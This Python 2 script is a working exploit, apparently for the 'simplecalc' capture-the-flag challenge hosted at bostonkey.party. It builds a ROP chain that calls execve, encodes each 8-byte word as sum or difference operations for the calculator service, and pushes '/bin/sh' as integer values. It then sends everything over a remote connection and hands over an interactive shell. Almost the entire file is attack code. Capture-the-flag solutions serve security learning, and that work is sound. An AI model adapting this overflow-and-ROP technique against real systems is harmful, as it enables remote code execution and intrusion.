from codez import *


def encode_payload(payload):
    """Turn a raw byte string into a list of (cmd, x, y) operand triples.

    ``payload`` is walked in 4-byte pieces (``chunks`` comes from ``codez``,
    which is not visible here) and each piece is unpacked with ``unpack('i')``
    as a native-endian signed 32-bit int ``val``.  Every piece yields exactly
    one triple:

    * ``(1, val/2, val/2 + val%2)`` when ``val/2 > 0x27`` -- the two operands
      add up to ``val``;
    * ``(2, 0x100 + val, 0x100)`` otherwise -- the two operands differ by
      ``val``.

    NOTE: written for Python 2 -- ``/`` on ints is floor division and the
    packed payload is a ``str``; the arithmetic identities above depend on that.
    """
    r = []
    for c in chunks(payload,4):
        val = unpack('i',c)[0]
        # Halves above 0x27 go out as a sum; everything else (including
        # negative values) as a difference offset by 0x100.
        if (val/2) > 0x27:
            r.append((1,val/2,val/2+val%2))
        else:
            r.append((2,0x100 + val,0x100))
    return r


# 72-byte filler: nine copies (72/8 == 9 under Python 2 integer division)
# of a single 8-byte packed word.
p = pack('Q',0x6c4aa0+16) * (72/8)
#p = "\x00"*72  uncomment for simple version
rop = [
    0x44db34,
    0x3b,
    0x401b73,
    0x6C4A80,
    0x401c87,
    0,
    0x437a85,
    0,
    0x4648e5
]
# Append every list entry as an 8-byte packed word, in order.
p += ''.join(map(lambda x:pack('Q',x),rop))
#p = p.ljust(252*4,'a')
#r = Remote('localhost',1234)
# Remote, read and sendline are provided by codez (not visible here);
# read(':') appears to consume output up to the next ':' prompt -- confirm.
# Note this `r` shadows nothing: encode_payload's `r` is a separate local.
r = Remote('simplecalc.bostonkey.party',5500)
r.read(':')
r.sendline('255')
#raw_input('dbg')
# Each encoded triple is answered to three consecutive prompts:
# the command number, then x, then y.
for cmd,x,y in encode_payload(p):
    r.sendline(str(cmd))
    r.read(':')
    r.sendline(str(x))
    r.read(':')
    r.sendline(str(y))
## push /bin/sh
r.sendline(str(1))
r.read(':')
r.sendline('1852400175')
r.read(':')
r.sendline('6845231')
## --- this can be removed in simple version ---
# Command 3 with two negative operands, formatted with "%d".
r.sendline(str(3))
r.read(':')
r.sendline("%d"%-0x21)
r.read(':')
r.sendline('%d'%-1)
## --- end ---
# Final command, then hand the connection over to the user.
r.sendline('5')
r.interactive()